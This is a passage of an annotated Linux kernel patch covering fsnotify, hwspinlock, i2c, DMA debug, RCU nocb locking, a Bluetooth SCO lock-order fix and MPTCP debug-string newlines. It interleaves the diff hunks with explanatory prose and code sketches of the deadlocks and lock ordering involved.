+ {
++	__u32 parent_mask = READ_ONCE(inode->i_fsnotify_mask);
++
+ 	/* FS_EVENT_ON_CHILD is set if the inode may care */
+-	if (!(inode->i_fsnotify_mask & FS_EVENT_ON_CHILD))
++	if (!(parent_mask & FS_EVENT_ON_CHILD))
+ 		return 0;
+ 	/* this inode might care about child events, does it care about the
+ 	 * specific set of events that can happen on a child? */
+-	return inode->i_fsnotify_mask & FS_EVENTS_POSS_ON_CHILD;
++	return parent_mask & FS_EVENTS_POSS_ON_CHILD;
+ }
+ 
+ /*
+@@ -582,7 +584,7 @@ static inline void fsnotify_update_flags(struct dentry *dentry)
+ 	/*
+ 	 * Serialisation of setting PARENT_WATCHED on the dentries is provided
+ 	 * by d_lock. If inotify_inode_watched changes after we have taken
+-	 * d_lock, the following __fsnotify_update_child_dentry_flags call will
++	 * d_lock, the following fsnotify_set_children_dentry_flags call will
+ 	 * find our entry, so it will spin until we complete here, and update
+ 	 * us with the new state.
+ 	 */
+diff --git a/include/linux/hwspinlock.h b/include/linux/hwspinlock.h
+index bfe7c1f1ac6d1..f0231dbc47771 100644
+--- a/include/linux/hwspinlock.h
++++ b/include/linux/hwspinlock.h
+@@ -68,6 +68,7 @@ int __hwspin_lock_timeout(struct hwspinlock *, unsigned int, int,
+ int __hwspin_trylock(struct hwspinlock *, int, unsigned long *);
+ void __hwspin_unlock(struct hwspinlock *, int, unsigned long *);
+ int of_hwspin_lock_get_id_byname(struct device_node *np, const char *name);
++int hwspin_lock_bust(struct hwspinlock *hwlock, unsigned int id);
+ int devm_hwspin_lock_free(struct device *dev, struct hwspinlock *hwlock);
+ struct hwspinlock *devm_hwspin_lock_request(struct device *dev);
+ struct hwspinlock *devm_hwspin_lock_request_specific(struct device *dev,
+@@ -127,6 +128,11 @@ void __hwspin_unlock(struct hwspinlock *hwlock, int mode, unsigned long *flags)
+ {
+ }
+ 
++static inline int hwspin_lock_bust(struct hwspinlock *hwlock, unsigned int id)
++{
++	return 0;
++}
++
+ static inline int of_hwspin_lock_get_id(struct device_node *np, int index)
+ {
+ 	return 0;
+diff --git a/include/linux/i2c.h b/include/linux/i2c.h
+index cfc59c3371cb2..35e296d9e1c55 100644
+--- a/include/linux/i2c.h
++++ b/include/linux/i2c.h
+@@ -1035,7 +1035,7 @@ static inline int of_i2c_get_board_info(struct device *dev,
+ struct acpi_resource;
+ struct acpi_resource_i2c_serialbus;
+ 
+-#if IS_ENABLED(CONFIG_ACPI)
++#if IS_REACHABLE(CONFIG_ACPI) && IS_REACHABLE(CONFIG_I2C)
+ bool i2c_acpi_get_i2c_resource(struct acpi_resource *ares,
+ 			       struct acpi_resource_i2c_serialbus **i2c);
+ int i2c_acpi_client_count(struct acpi_device *adev);
+diff --git a/kernel/dma/debug.c b/kernel/dma/debug.c
+index 3ff7089d11a92..de02c0808fb83 100644
+--- a/kernel/dma/debug.c
++++ b/kernel/dma/debug.c
+@@ -445,8 +445,11 @@ void debug_dma_dump_mappings(struct device *dev)
+  * dma_active_cacheline entry to track per event.  dma_map_sg(), on the
+  * other hand, consumes a single dma_debug_entry, but inserts 'nents'
+  * entries into the tree.
++ *
++ * Use __GFP_NOWARN because the printk from an OOM, to netconsole, could end
++ * up right back in the DMA debugging code, leading to a deadlock.
+  */
+-static RADIX_TREE(dma_active_cacheline, GFP_ATOMIC);
++static RADIX_TREE(dma_active_cacheline, GFP_ATOMIC | __GFP_NOWARN);
+ static DEFINE_SPINLOCK(radix_lock);
+ #define ACTIVE_CACHELINE_MAX_OVERLAP ((1 << RADIX_TREE_MAX_TAGS) - 1)
+ #define CACHELINE_PER_PAGE_SHIFT (PAGE_SHIFT - L1_CACHE_SHIFT)
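
The flag matters because radix_tree_insert() with GFP_ATOMIC can fail under pressure, and the default allocation-failure warning is itself a printk. Spelled out as an illustrative call chain:

    /*
     * The cycle __GFP_NOWARN breaks:
     *
     *   radix_tree_insert(..., GFP_ATOMIC)      // radix_lock held
     *     -> allocation fails, warning printk fires
     *       -> netconsole transmits the message
     *         -> dma_map_single() for the packet
     *           -> dma-debug bookkeeping
     *             -> spin_lock(&radix_lock)     // already held: deadlock
     *
     * Making the failure silent removes the printk link from the chain.
     */
    static RADIX_TREE(dma_active_cacheline, GFP_ATOMIC | __GFP_NOWARN);
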
+diff --git a/kernel/rcu/tree.h b/kernel/rcu/tree.h
+index 7b702220d81cb..aa16d3cd62ba5 100644
+--- a/kernel/rcu/tree.h
++++ b/kernel/rcu/tree.h
+@@ -207,7 +207,6 @@ struct rcu_data {
+ 	struct swait_queue_head nocb_state_wq; /* For offloading state changes */
+ 	struct task_struct *nocb_gp_kthread;
+ 	raw_spinlock_t nocb_lock;	/* Guard following pair of fields. */
+-	atomic_t nocb_lock_contended;	/* Contention experienced. */
+ 	int nocb_defer_wakeup;		/* Defer wakeup of nocb_kthread. */
+ 	struct timer_list nocb_timer;	/* Enforce finite deferral. */
+ 	unsigned long nocb_gp_adv_time;	/* Last call_rcu() CB adv (jiffies). */
+diff --git a/kernel/rcu/tree_nocb.h b/kernel/rcu/tree_nocb.h
+index 0a5f0ef414845..6499eefa06603 100644
+--- a/kernel/rcu/tree_nocb.h
++++ b/kernel/rcu/tree_nocb.h
+@@ -91,8 +91,7 @@ module_param(nocb_nobypass_lim_per_jiffy, int, 0);
+ 
+ /*
+  * Acquire the specified rcu_data structure's ->nocb_bypass_lock.  If the
+- * lock isn't immediately available, increment ->nocb_lock_contended to
+- * flag the contention.
++ * lock isn't immediately available, perform minimal sanity check.
+  */
+ static void rcu_nocb_bypass_lock(struct rcu_data *rdp)
+ 	__acquires(&rdp->nocb_bypass_lock)
+@@ -100,29 +99,12 @@ static void rcu_nocb_bypass_lock(struct rcu_data *rdp)
+ 	lockdep_assert_irqs_disabled();
+ 	if (raw_spin_trylock(&rdp->nocb_bypass_lock))
+ 		return;
+-	atomic_inc(&rdp->nocb_lock_contended);
++	/*
++	 * Contention is expected only when a local enqueue collides with a
++	 * remote flush from the kthreads.
++	 */
+ 	WARN_ON_ONCE(smp_processor_id() != rdp->cpu);
+-	smp_mb__after_atomic(); /* atomic_inc() before lock. */
+ 	raw_spin_lock(&rdp->nocb_bypass_lock);
+-	smp_mb__before_atomic(); /* atomic_dec() after lock. */
+-	atomic_dec(&rdp->nocb_lock_contended);
+-}
+-
+-/*
+- * Spinwait until the specified rcu_data structure's ->nocb_lock is
+- * not contended.  Please note that this is extremely special-purpose,
+- * relying on the fact that at most two kthreads and one CPU contend for
+- * this lock, and also that the two kthreads are guaranteed to have frequent
+- * grace-period-duration time intervals between successive acquisitions
+- * of the lock.  This allows us to use an extremely simple throttling
+- * mechanism, and further to apply it only to the CPU doing floods of
+- * call_rcu() invocations.  Don't try this at home!
+- */
+-static void rcu_nocb_wait_contended(struct rcu_data *rdp)
+-{
+-	WARN_ON_ONCE(smp_processor_id() != rdp->cpu);
+-	while (WARN_ON_ONCE(atomic_read(&rdp->nocb_lock_contended)))
+-		cpu_relax();
+ }
+ 
+ /*
+@@ -452,7 +434,6 @@ static bool rcu_nocb_try_bypass(struct rcu_data *rdp, struct rcu_head *rhp,
+ 	}
+ 
+ 	// We need to use the bypass.
+-	rcu_nocb_wait_contended(rdp);
+ 	rcu_nocb_bypass_lock(rdp);
+ 	ncbs = rcu_cblist_n_cbs(&rdp->nocb_bypass);
+ 	rcu_segcblist_inc_len(&rdp->cblist); /* Must precede enqueue. */
+@@ -1476,12 +1457,11 @@ static void show_rcu_nocb_state(struct rcu_data *rdp)
+ 
+ 	sprintf(bufw, "%ld", rsclp->gp_seq[RCU_WAIT_TAIL]);
+ 	sprintf(bufr, "%ld", rsclp->gp_seq[RCU_NEXT_READY_TAIL]);
+-	pr_info("   CB %d^%d->%d %c%c%c%c%c%c F%ld L%ld C%d %c%c%s%c%s%c%c q%ld %c CPU %d%s\n",
++	pr_info("   CB %d^%d->%d %c%c%c%c%c F%ld L%ld C%d %c%c%s%c%s%c%c q%ld %c CPU %d%s\n",
+ 		rdp->cpu, rdp->nocb_gp_rdp->cpu,
+ 		nocb_next_rdp ? nocb_next_rdp->cpu : -1,
+ 		"kK"[!!rdp->nocb_cb_kthread],
+ 		"bB"[raw_spin_is_locked(&rdp->nocb_bypass_lock)],
+-		"cC"[!!atomic_read(&rdp->nocb_lock_contended)],
+ 		"lL"[raw_spin_is_locked(&rdp->nocb_lock)],
+ 		"sS"[!!rdp->nocb_cb_sleep],
+ 		".W"[swait_active(&rdp->nocb_cb_wq)],
+diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
+index a3bbe04b11383..92ea01f9def3e 100644
+--- a/net/bluetooth/sco.c
++++ b/net/bluetooth/sco.c
+@@ -130,8 +130,11 @@ static struct sco_conn *sco_conn_add(struct hci_conn *hcon)
+ 	struct hci_dev *hdev = hcon->hdev;
+ 	struct sco_conn *conn = hcon->sco_data;
+ 
+-	if (conn)
++	if (conn) {
++		if (!conn->hcon)
++			conn->hcon = hcon;
+ 		return conn;
++	}
+ 
+ 	conn = kzalloc(sizeof(struct sco_conn), GFP_KERNEL);
+ 	if (!conn)
+@@ -239,40 +242,56 @@ static int sco_chan_add(struct sco_conn *conn, struct sock *sk,
+ 	return err;
+ }
+ 
+-static int sco_connect(struct hci_dev *hdev, struct sock *sk)
++static int sco_connect(struct sock *sk)
+ {
+ 	struct sco_conn *conn;
+ 	struct hci_conn *hcon;
++	struct hci_dev  *hdev;
+ 	int err, type;
+ 
+ 	BT_DBG("%pMR -> %pMR", &sco_pi(sk)->src, &sco_pi(sk)->dst);
+ 
++	hdev = hci_get_route(&sco_pi(sk)->dst, &sco_pi(sk)->src, BDADDR_BREDR);
++	if (!hdev)
++		return -EHOSTUNREACH;
++
++	hci_dev_lock(hdev);
++
+ 	if (lmp_esco_capable(hdev) && !disable_esco)
+ 		type = ESCO_LINK;
+ 	else
+ 		type = SCO_LINK;
+ 
+ 	if (sco_pi(sk)->setting == BT_VOICE_TRANSPARENT &&
+-	    (!lmp_transp_capable(hdev) || !lmp_esco_capable(hdev)))
+-		return -EOPNOTSUPP;
++	    (!lmp_transp_capable(hdev) || !lmp_esco_capable(hdev))) {
++		err = -EOPNOTSUPP;
++		goto unlock;
++	}
+ 
+ 	hcon = hci_connect_sco(hdev, type, &sco_pi(sk)->dst,
+ 			       sco_pi(sk)->setting, &sco_pi(sk)->codec);
+-	if (IS_ERR(hcon))
+-		return PTR_ERR(hcon);
++	if (IS_ERR(hcon)) {
++		err = PTR_ERR(hcon);
++		goto unlock;
++	}
+ 
+ 	conn = sco_conn_add(hcon);
+ 	if (!conn) {
+ 		hci_conn_drop(hcon);
+-		return -ENOMEM;
++		err = -ENOMEM;
++		goto unlock;
+ 	}
+ 
+-	/* Update source addr of the socket */
+-	bacpy(&sco_pi(sk)->src, &hcon->src);
++	lock_sock(sk);
+ 
+ 	err = sco_chan_add(conn, sk, NULL);
+-	if (err)
+-		return err;
++	if (err) {
++		release_sock(sk);
++		goto unlock;
++	}
++
++	/* Update source addr of the socket */
++	bacpy(&sco_pi(sk)->src, &hcon->src);
+ 
+ 	if (hcon->state == BT_CONNECTED) {
+ 		sco_sock_clear_timer(sk);
+@@ -282,6 +301,11 @@ static int sco_connect(struct hci_dev *hdev, struct sock *sk)
+ 		sco_sock_set_timer(sk, sk->sk_sndtimeo);
+ 	}
+ 
++	release_sock(sk);
++
++unlock:
++	hci_dev_unlock(hdev);
++	hci_dev_put(hdev);
+ 	return err;
+ }
+ 
+@@ -561,7 +585,6 @@ static int sco_sock_connect(struct socket *sock, struct sockaddr *addr, int alen
+ {
+ 	struct sockaddr_sco *sa = (struct sockaddr_sco *) addr;
+ 	struct sock *sk = sock->sk;
+-	struct hci_dev  *hdev;
+ 	int err;
+ 
+ 	BT_DBG("sk %p", sk);
+@@ -570,37 +593,26 @@ static int sco_sock_connect(struct socket *sock, struct sockaddr *addr, int alen
+ 	    addr->sa_family != AF_BLUETOOTH)
+ 		return -EINVAL;
+ 
+-	lock_sock(sk);
+-	if (sk->sk_state != BT_OPEN && sk->sk_state != BT_BOUND) {
+-		err = -EBADFD;
+-		goto done;
+-	}
++	if (sk->sk_state != BT_OPEN && sk->sk_state != BT_BOUND)
++		return -EBADFD;
+ 
+-	if (sk->sk_type != SOCK_SEQPACKET) {
++	if (sk->sk_type != SOCK_SEQPACKET)
+ 		err = -EINVAL;
+-		goto done;
+-	}
+-
+-	hdev = hci_get_route(&sa->sco_bdaddr, &sco_pi(sk)->src, BDADDR_BREDR);
+-	if (!hdev) {
+-		err = -EHOSTUNREACH;
+-		goto done;
+-	}
+-	hci_dev_lock(hdev);
+ 
++	lock_sock(sk);
+ 	/* Set destination address and psm */
+ 	bacpy(&sco_pi(sk)->dst, &sa->sco_bdaddr);
++	release_sock(sk);
+ 
+-	err = sco_connect(hdev, sk);
+-	hci_dev_unlock(hdev);
+-	hci_dev_put(hdev);
++	err = sco_connect(sk);
+ 	if (err)
+-		goto done;
++		return err;
++
++	lock_sock(sk);
+ 
+ 	err = bt_sock_wait_state(sk, BT_CONNECTED,
+ 				 sock_sndtimeo(sk, flags & O_NONBLOCK));
+ 
+-done:
+ 	release_sock(sk);
+ 	return err;
+ }
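
The restructuring pins down a single lock order, hci_dev lock before sk lock, by resolving the route and taking hci_dev_lock() inside sco_connect() and holding lock_sock() only for the short windows that touch socket state. The resulting skeleton (a sketch; dst and src stand for &sco_pi(sk)->dst and &sco_pi(sk)->src, error paths trimmed):

    static int sco_connect_sketch(struct sock *sk)
    {
    	struct hci_dev *hdev;
    	int err = 0;

    	hdev = hci_get_route(dst, src, BDADDR_BREDR);
    	if (!hdev)
    		return -EHOSTUNREACH;

    	hci_dev_lock(hdev);			/* 1: device lock first */

    	/* ... resolve link type, create hcon and conn ... */

    	lock_sock(sk);				/* 2: socket lock nested */
    	/* ... attach channel, copy source address, arm timer ... */
    	release_sock(sk);

    	hci_dev_unlock(hdev);
    	hci_dev_put(hdev);
    	return err;
    }
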
+diff --git a/net/mptcp/options.c b/net/mptcp/options.c
+index d469ad6c6a0ba..517bbfe5f626e 100644
+--- a/net/mptcp/options.c
++++ b/net/mptcp/options.c
+@@ -112,7 +112,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 			mp_opt->suboptions |= OPTION_MPTCP_CSUMREQD;
+ 			ptr += 2;
+ 		}
+-		pr_debug("MP_CAPABLE version=%x, flags=%x, optlen=%d sndr=%llu, rcvr=%llu len=%d csum=%u",
++		pr_debug("MP_CAPABLE version=%x, flags=%x, optlen=%d sndr=%llu, rcvr=%llu len=%d csum=%u\n",
+ 			 version, flags, opsize, mp_opt->sndr_key,
+ 			 mp_opt->rcvr_key, mp_opt->data_len, mp_opt->csum);
+ 		break;
+@@ -126,7 +126,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 			ptr += 4;
+ 			mp_opt->nonce = get_unaligned_be32(ptr);
+ 			ptr += 4;
+-			pr_debug("MP_JOIN bkup=%u, id=%u, token=%u, nonce=%u",
++			pr_debug("MP_JOIN bkup=%u, id=%u, token=%u, nonce=%u\n",
+ 				 mp_opt->backup, mp_opt->join_id,
+ 				 mp_opt->token, mp_opt->nonce);
+ 		} else if (opsize == TCPOLEN_MPTCP_MPJ_SYNACK) {
+@@ -137,19 +137,19 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 			ptr += 8;
+ 			mp_opt->nonce = get_unaligned_be32(ptr);
+ 			ptr += 4;
+-			pr_debug("MP_JOIN bkup=%u, id=%u, thmac=%llu, nonce=%u",
++			pr_debug("MP_JOIN bkup=%u, id=%u, thmac=%llu, nonce=%u\n",
+ 				 mp_opt->backup, mp_opt->join_id,
+ 				 mp_opt->thmac, mp_opt->nonce);
+ 		} else if (opsize == TCPOLEN_MPTCP_MPJ_ACK) {
+ 			mp_opt->suboptions |= OPTION_MPTCP_MPJ_ACK;
+ 			ptr += 2;
+ 			memcpy(mp_opt->hmac, ptr, MPTCPOPT_HMAC_LEN);
+-			pr_debug("MP_JOIN hmac");
++			pr_debug("MP_JOIN hmac\n");
+ 		}
+ 		break;
+ 
+ 	case MPTCPOPT_DSS:
+-		pr_debug("DSS");
++		pr_debug("DSS\n");
+ 		ptr++;
+ 
+ 		/* we must clear 'mpc_map' be able to detect MP_CAPABLE
+@@ -164,7 +164,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 		mp_opt->ack64 = (flags & MPTCP_DSS_ACK64) != 0;
+ 		mp_opt->use_ack = (flags & MPTCP_DSS_HAS_ACK);
+ 
+-		pr_debug("data_fin=%d dsn64=%d use_map=%d ack64=%d use_ack=%d",
++		pr_debug("data_fin=%d dsn64=%d use_map=%d ack64=%d use_ack=%d\n",
+ 			 mp_opt->data_fin, mp_opt->dsn64,
+ 			 mp_opt->use_map, mp_opt->ack64,
+ 			 mp_opt->use_ack);
+@@ -202,7 +202,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 				ptr += 4;
+ 			}
+ 
+-			pr_debug("data_ack=%llu", mp_opt->data_ack);
++			pr_debug("data_ack=%llu\n", mp_opt->data_ack);
+ 		}
+ 
+ 		if (mp_opt->use_map) {
+@@ -226,7 +226,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 				ptr += 2;
+ 			}
+ 
+-			pr_debug("data_seq=%llu subflow_seq=%u data_len=%u csum=%d:%u",
++			pr_debug("data_seq=%llu subflow_seq=%u data_len=%u csum=%d:%u\n",
+ 				 mp_opt->data_seq, mp_opt->subflow_seq,
+ 				 mp_opt->data_len, !!(mp_opt->suboptions & OPTION_MPTCP_CSUMREQD),
+ 				 mp_opt->csum);
+@@ -288,7 +288,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 			mp_opt->ahmac = get_unaligned_be64(ptr);
+ 			ptr += 8;
+ 		}
+-		pr_debug("ADD_ADDR%s: id=%d, ahmac=%llu, echo=%d, port=%d",
++		pr_debug("ADD_ADDR%s: id=%d, ahmac=%llu, echo=%d, port=%d\n",
+ 			 (mp_opt->addr.family == AF_INET6) ? "6" : "",
+ 			 mp_opt->addr.id, mp_opt->ahmac, mp_opt->echo, ntohs(mp_opt->addr.port));
+ 		break;
+@@ -304,7 +304,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 		mp_opt->rm_list.nr = opsize - TCPOLEN_MPTCP_RM_ADDR_BASE;
+ 		for (i = 0; i < mp_opt->rm_list.nr; i++)
+ 			mp_opt->rm_list.ids[i] = *ptr++;
+-		pr_debug("RM_ADDR: rm_list_nr=%d", mp_opt->rm_list.nr);
++		pr_debug("RM_ADDR: rm_list_nr=%d\n", mp_opt->rm_list.nr);
+ 		break;
+ 
+ 	case MPTCPOPT_MP_PRIO:
+@@ -313,7 +313,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 
+ 		mp_opt->suboptions |= OPTION_MPTCP_PRIO;
+ 		mp_opt->backup = *ptr++ & MPTCP_PRIO_BKUP;
+-		pr_debug("MP_PRIO: prio=%d", mp_opt->backup);
++		pr_debug("MP_PRIO: prio=%d\n", mp_opt->backup);
+ 		break;
+ 
+ 	case MPTCPOPT_MP_FASTCLOSE:
+@@ -324,7 +324,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 		mp_opt->rcvr_key = get_unaligned_be64(ptr);
+ 		ptr += 8;
+ 		mp_opt->suboptions |= OPTION_MPTCP_FASTCLOSE;
+-		pr_debug("MP_FASTCLOSE: recv_key=%llu", mp_opt->rcvr_key);
++		pr_debug("MP_FASTCLOSE: recv_key=%llu\n", mp_opt->rcvr_key);
+ 		break;
+ 
+ 	case MPTCPOPT_RST:
+@@ -338,7 +338,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 		flags = *ptr++;
+ 		mp_opt->reset_transient = flags & MPTCP_RST_TRANSIENT;
+ 		mp_opt->reset_reason = *ptr;
+-		pr_debug("MP_RST: transient=%u reason=%u",
++		pr_debug("MP_RST: transient=%u reason=%u\n",
+ 			 mp_opt->reset_transient, mp_opt->reset_reason);
+ 		break;
+ 
+@@ -349,7 +349,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 		ptr += 2;
+ 		mp_opt->suboptions |= OPTION_MPTCP_FAIL;
+ 		mp_opt->fail_seq = get_unaligned_be64(ptr);
+-		pr_debug("MP_FAIL: data_seq=%llu", mp_opt->fail_seq);
++		pr_debug("MP_FAIL: data_seq=%llu\n", mp_opt->fail_seq);
+ 		break;
+ 
+ 	default:
+@@ -412,7 +412,7 @@ bool mptcp_syn_options(struct sock *sk, const struct sk_buff *skb,
+ 		*size = TCPOLEN_MPTCP_MPC_SYN;
+ 		return true;
+ 	} else if (subflow->request_join) {
+-		pr_debug("remote_token=%u, nonce=%u", subflow->remote_token,
++		pr_debug("remote_token=%u, nonce=%u\n", subflow->remote_token,
+ 			 subflow->local_nonce);
+ 		opts->suboptions = OPTION_MPTCP_MPJ_SYN;
+ 		opts->join_id = subflow->local_id;
+@@ -496,7 +496,7 @@ static bool mptcp_established_options_mp(struct sock *sk, struct sk_buff *skb,
+ 			*size = TCPOLEN_MPTCP_MPC_ACK;
+ 		}
+ 
+-		pr_debug("subflow=%p, local_key=%llu, remote_key=%llu map_len=%d",
++		pr_debug("subflow=%p, local_key=%llu, remote_key=%llu map_len=%d\n",
+ 			 subflow, subflow->local_key, subflow->remote_key,
+ 			 data_len);
+ 
+@@ -505,7 +505,7 @@ static bool mptcp_established_options_mp(struct sock *sk, struct sk_buff *skb,
+ 		opts->suboptions = OPTION_MPTCP_MPJ_ACK;
+ 		memcpy(opts->hmac, subflow->hmac, MPTCPOPT_HMAC_LEN);
+ 		*size = TCPOLEN_MPTCP_MPJ_ACK;
+-		pr_debug("subflow=%p", subflow);
++		pr_debug("subflow=%p\n", subflow);
+ 
+ 		/* we can use the full delegate action helper only from BH context
+ 		 * If we are in process context - sk is flushing the backlog at
+@@ -673,7 +673,7 @@ static bool mptcp_established_options_add_addr(struct sock *sk, struct sk_buff *
+ 
+ 	*size = len;
+ 	if (drop_other_suboptions) {
+-		pr_debug("drop other suboptions");
++		pr_debug("drop other suboptions\n");
+ 		opts->suboptions = 0;
+ 
+ 		/* note that e.g. DSS could have written into the memory
+@@ -690,7 +690,7 @@ static bool mptcp_established_options_add_addr(struct sock *sk, struct sk_buff *
+ 						     msk->remote_key,
+ 						     &opts->addr);
+ 	}
+-	pr_debug("addr_id=%d, ahmac=%llu, echo=%d, port=%d",
++	pr_debug("addr_id=%d, ahmac=%llu, echo=%d, port=%d\n",
+ 		 opts->addr.id, opts->ahmac, echo, ntohs(opts->addr.port));
+ 
+ 	return true;
+@@ -721,7 +721,7 @@ static bool mptcp_established_options_rm_addr(struct sock *sk,
+ 	opts->rm_list = rm_list;
+ 
+ 	for (i = 0; i < opts->rm_list.nr; i++)
+-		pr_debug("rm_list_ids[%d]=%d", i, opts->rm_list.ids[i]);
++		pr_debug("rm_list_ids[%d]=%d\n", i, opts->rm_list.ids[i]);
+ 
+ 	return true;
+ }
+@@ -747,7 +747,7 @@ static bool mptcp_established_options_mp_prio(struct sock *sk,
+ 	opts->suboptions |= OPTION_MPTCP_PRIO;
+ 	opts->backup = subflow->request_bkup;
+ 
+-	pr_debug("prio=%d", opts->backup);
++	pr_debug("prio=%d\n", opts->backup);
+ 
+ 	return true;
+ }
+@@ -789,7 +789,7 @@ static bool mptcp_established_options_fastclose(struct sock *sk,
+ 	opts->suboptions |= OPTION_MPTCP_FASTCLOSE;
+ 	opts->rcvr_key = msk->remote_key;
+ 
+-	pr_debug("FASTCLOSE key=%llu", opts->rcvr_key);
++	pr_debug("FASTCLOSE key=%llu\n", opts->rcvr_key);
+ 	MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_MPFASTCLOSETX);
+ 	return true;
+ }
+@@ -811,7 +811,7 @@ static bool mptcp_established_options_mp_fail(struct sock *sk,
+ 	opts->suboptions |= OPTION_MPTCP_FAIL;
+ 	opts->fail_seq = subflow->map_seq;
+ 
+-	pr_debug("MP_FAIL fail_seq=%llu", opts->fail_seq);
++	pr_debug("MP_FAIL fail_seq=%llu\n", opts->fail_seq);
+ 	MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_MPFAILTX);
+ 
+ 	return true;
+@@ -899,7 +899,7 @@ bool mptcp_synack_options(const struct request_sock *req, unsigned int *size,
+ 		opts->csum_reqd = subflow_req->csum_reqd;
+ 		opts->allow_join_id0 = subflow_req->allow_join_id0;
+ 		*size = TCPOLEN_MPTCP_MPC_SYNACK;
+-		pr_debug("subflow_req=%p, local_key=%llu",
++		pr_debug("subflow_req=%p, local_key=%llu\n",
+ 			 subflow_req, subflow_req->local_key);
+ 		return true;
+ 	} else if (subflow_req->mp_join) {
+@@ -908,7 +908,7 @@ bool mptcp_synack_options(const struct request_sock *req, unsigned int *size,
+ 		opts->join_id = subflow_req->local_id;
+ 		opts->thmac = subflow_req->thmac;
+ 		opts->nonce = subflow_req->local_nonce;
+-		pr_debug("req=%p, bkup=%u, id=%u, thmac=%llu, nonce=%u",
++		pr_debug("req=%p, bkup=%u, id=%u, thmac=%llu, nonce=%u\n",
+ 			 subflow_req, opts->backup, opts->join_id,
+ 			 opts->thmac, opts->nonce);
+ 		*size = TCPOLEN_MPTCP_MPJ_SYNACK;
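
Every hunk in this and the following MPTCP files makes the same mechanical change: pr_debug() format strings gain a trailing \n. Without one, the record is left open as a potential KERN_CONT continuation, so it may be flushed late and output from other contexts can interleave with it. In miniature (a sketch):

    /* Without a terminator the record stays open as a continuation
     * fragment; another CPU printing in between can glue its text on. */
    pr_debug("MP_JOIN hmac");	/* before: record left open */
    pr_debug("MP_JOIN hmac\n");	/* after: record closed at once */
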
+diff --git a/net/mptcp/pm.c b/net/mptcp/pm.c
+index 5646c7275a92d..34120694ad49b 100644
+--- a/net/mptcp/pm.c
++++ b/net/mptcp/pm.c
+@@ -20,7 +20,7 @@ int mptcp_pm_announce_addr(struct mptcp_sock *msk,
+ {
+ 	u8 add_addr = READ_ONCE(msk->pm.addr_signal);
+ 
+-	pr_debug("msk=%p, local_id=%d, echo=%d", msk, addr->id, echo);
++	pr_debug("msk=%p, local_id=%d, echo=%d\n", msk, addr->id, echo);
+ 
+ 	lockdep_assert_held(&msk->pm.lock);
+ 
+@@ -45,7 +45,7 @@ int mptcp_pm_remove_addr(struct mptcp_sock *msk, const struct mptcp_rm_list *rm_
+ {
+ 	u8 rm_addr = READ_ONCE(msk->pm.addr_signal);
+ 
+-	pr_debug("msk=%p, rm_list_nr=%d", msk, rm_list->nr);
++	pr_debug("msk=%p, rm_list_nr=%d\n", msk, rm_list->nr);
+ 
+ 	if (rm_addr) {
+ 		pr_warn("addr_signal error, rm_addr=%d", rm_addr);
+@@ -65,7 +65,7 @@ void mptcp_pm_new_connection(struct mptcp_sock *msk, const struct sock *ssk, int
+ {
+ 	struct mptcp_pm_data *pm = &msk->pm;
+ 
+-	pr_debug("msk=%p, token=%u side=%d", msk, msk->token, server_side);
++	pr_debug("msk=%p, token=%u side=%d\n", msk, msk->token, server_side);
+ 
+ 	WRITE_ONCE(pm->server_side, server_side);
+ 	mptcp_event(MPTCP_EVENT_CREATED, msk, ssk, GFP_ATOMIC);
+@@ -89,7 +89,7 @@ bool mptcp_pm_allow_new_subflow(struct mptcp_sock *msk)
+ 
+ 	subflows_max = mptcp_pm_get_subflows_max(msk);
+ 
+-	pr_debug("msk=%p subflows=%d max=%d allow=%d", msk, pm->subflows,
++	pr_debug("msk=%p subflows=%d max=%d allow=%d\n", msk, pm->subflows,
+ 		 subflows_max, READ_ONCE(pm->accept_subflow));
+ 
+ 	/* try to avoid acquiring the lock below */
+@@ -113,7 +113,7 @@ bool mptcp_pm_allow_new_subflow(struct mptcp_sock *msk)
+ static bool mptcp_pm_schedule_work(struct mptcp_sock *msk,
+ 				   enum mptcp_pm_status new_status)
+ {
+-	pr_debug("msk=%p status=%x new=%lx", msk, msk->pm.status,
++	pr_debug("msk=%p status=%x new=%lx\n", msk, msk->pm.status,
+ 		 BIT(new_status));
+ 	if (msk->pm.status & BIT(new_status))
+ 		return false;
+@@ -128,7 +128,7 @@ void mptcp_pm_fully_established(struct mptcp_sock *msk, const struct sock *ssk,
+ 	struct mptcp_pm_data *pm = &msk->pm;
+ 	bool announce = false;
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	spin_lock_bh(&pm->lock);
+ 
+@@ -152,14 +152,14 @@ void mptcp_pm_fully_established(struct mptcp_sock *msk, const struct sock *ssk,
+ 
+ void mptcp_pm_connection_closed(struct mptcp_sock *msk)
+ {
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ }
+ 
+ void mptcp_pm_subflow_established(struct mptcp_sock *msk)
+ {
+ 	struct mptcp_pm_data *pm = &msk->pm;
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	if (!READ_ONCE(pm->work_pending))
+ 		return;
+@@ -211,7 +211,7 @@ void mptcp_pm_add_addr_received(const struct sock *ssk,
+ 	struct mptcp_sock *msk = mptcp_sk(subflow->conn);
+ 	struct mptcp_pm_data *pm = &msk->pm;
+ 
+-	pr_debug("msk=%p remote_id=%d accept=%d", msk, addr->id,
++	pr_debug("msk=%p remote_id=%d accept=%d\n", msk, addr->id,
+ 		 READ_ONCE(pm->accept_addr));
+ 
+ 	mptcp_event_addr_announced(ssk, addr);
+@@ -244,7 +244,7 @@ void mptcp_pm_add_addr_echoed(struct mptcp_sock *msk,
+ {
+ 	struct mptcp_pm_data *pm = &msk->pm;
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	spin_lock_bh(&pm->lock);
+ 
